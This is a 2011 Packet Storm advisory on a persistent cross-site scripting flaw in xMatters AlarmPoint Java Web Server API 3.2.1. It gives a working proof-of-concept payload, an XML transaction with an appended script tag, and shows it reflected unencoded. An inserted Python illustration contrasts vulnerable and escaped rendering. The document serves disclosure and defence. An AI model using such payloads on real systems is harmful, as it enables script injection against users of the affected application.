xMatters AlarmPoint Java Web Server API 3.2.1 Cross Site Scripting

2011-04-28T00:00:00
ID PACKETSTORM:100919
Type packetstorm
Reporter Juan Sacco
Modified 2011-04-28T00:00:00

Description

Information  
--------------------  
Name : XSS Persistent vulnerability in xMatters AlarmPoint Java Web   
Server API  
Software : xMatters AlarmPoint  
Vendor Homepage : http://www.xmatters.com  
Vulnerability Type : Cross-Site Scripting  
Severity : High  
Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>  
  
Description  
------------------  
The AlarmPoint Java Server consists of a collection of software   
components and software APIs designed to provide a flexible and  
powerful set of tools for integrating various applications with   
AlarmPoint.  
  
Details  
-------------------  
AlarmPoint Java Web Server API is affected by a Persistent XSS   
vulnerability in version 3.2.1  
  
Exploit as follows:  
Insert a new HTTP API transaction with the following malicious code (a   
well-formed Alive transaction with the script appended after the closing   
tag):  
<?xml version="1.0"?>  
<transaction version="1.0">  
<header>  
<method>Alive</method>  
</header>  
<data>  
<agent_client_id>ping</agent_client_id>  
</data>  
</transaction>'><script>alert(/XSS/)</script>  
  
Go to: http://example.com:2010/agent/status.html  
Response:  
AgentStatus  
3.2.1 (Build   
23894/20071210175331)ea-cad0f2c429ee/192.168.72.128Unavailable192.168.72.128:2004115'><script>alert(/XSS/)</script>  
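The following Python is an added illustration, not code from the advisory or from xMatters. It models the stored XSS path described above: an identifier submitted in an API transaction is stored and later written into status.html without HTML encoding, so a value that starts with `'>` closes the enclosing single-quoted attribute and tag and the appended `<script>` executes in the browser of whoever views the status page. The table-row layout, the `href` attribute and the function names `render_status_row_vulnerable`, `render_status_row_fixed`, `contains_live_script` and `payload_reflected_raw` are assumptions for the demonstration; the advisory shows only the rendered text, not the real AlarmPoint markup. The hardened variant is the generic fix: encode every untrusted value for the HTML context (including quotes) before insertion.

```python
"""Stored XSS in an agent status page: vulnerable vs. hardened rendering.

Added example; not code from xMatters, AlarmPoint or the advisory author.
The row layout, the href attribute and the function names are assumptions
for the demonstration; the advisory shows only the rendered text.
"""
import html
import re

# Constructed payload in the shape the advisory gives: a well-formed Alive
# transaction with the script tag appended after the closing element.
TRANSACTION_XML = (
    '<?xml version="1.0"?>'
    '<transaction version="1.0">'
    '<header><method>Alive</method></header>'
    '<data><agent_client_id>ping</agent_client_id></data>'
    '</transaction>'
)
XSS_SUFFIX = "'><script>alert(/XSS/)</script>"
PAYLOAD = TRANSACTION_XML + XSS_SUFFIX

# The rendered text the advisory reports after visiting /agent/status.html
# (copied from the advisory; the tags were stripped when it was pasted).
OBSERVED_STATUS_TEXT = (
    "AgentStatus 3.2.1 (Build 23894/20071210175331)ea-cad0f2c429ee/"
    "192.168.72.128Unavailable192.168.72.128:2004115"
    "'><script>alert(/XSS/)</script>"
)

SCRIPT_START = re.compile(r"<script\b", re.IGNORECASE)


def render_status_row_vulnerable(agent_id: str, host: str, state: str) -> str:
    """Assumed vulnerable rendering: values are interpolated into the HTML
    as-is. A stored agent_id containing '> closes the href attribute and the
    <a> tag, and everything after it is parsed as live markup."""
    return (
        f"<tr><td><a href='/agent/{agent_id}'>{agent_id}</a></td>"
        f"<td>{host}</td><td>{state}</td></tr>"
    )


def render_status_row_fixed(agent_id: str, host: str, state: str) -> str:
    """Hardened rendering: every untrusted value is encoded for the HTML
    context before insertion. quote=True also encodes ' and ", so a value
    cannot terminate the attribute it is placed in."""
    def esc(value: str) -> str:
        return html.escape(value, quote=True)
    return (
        f"<tr><td><a href='/agent/{esc(agent_id)}'>{esc(agent_id)}</a></td>"
        f"<td>{esc(host)}</td><td>{esc(state)}</td></tr>"
    )


def contains_live_script(fragment: str) -> bool:
    """True when an unencoded <script> start tag is present, i.e. when a
    browser rendering the fragment would execute it."""
    return SCRIPT_START.search(fragment) is not None


def payload_reflected_raw(page_body: str, marker: str = XSS_SUFFIX) -> bool:
    """Check a fetched status page body for the payload appearing with its
    angle brackets intact. Had the server encoded it, the body would hold
    &lt;script&gt; and the raw marker would not be a substring."""
    return marker in page_body


if __name__ == "__main__":
    host, state = "192.168.72.128", "Unavailable"
    print("vulnerable:", render_status_row_vulnerable(PAYLOAD, host, state))
    print("fixed:     ", render_status_row_fixed(PAYLOAD, host, state))
    print("advisory output reflects payload raw:",
          payload_reflected_raw(OBSERVED_STATUS_TEXT))
```

`payload_reflected_raw` is the check to run against the body returned by `/agent/status.html` after submitting the transaction: the advisory's quoted response contains the suffix with its brackets intact, which is exactly what a server encoding its output would never emit.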
  
Cross-Site Scripting attacks are a type of injection problem, in which   
malicious scripts are injected into the otherwise benign and trusted web   
sites.  
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29  
  
Solution  
-------------------  
No patch is available at this time.  
  
Credits  
-------------------  
Manually discovered by Insecurity Research Labs  
Juan Sacco - http://www.insecurityresearch.com  
  
--   
--  
_________________________________________________  
Insecurity Research - Security auditing and testing software  
Web: http://www.insecurityresearch.com  
Insect Pro 2.5 was released, stay tuned  
  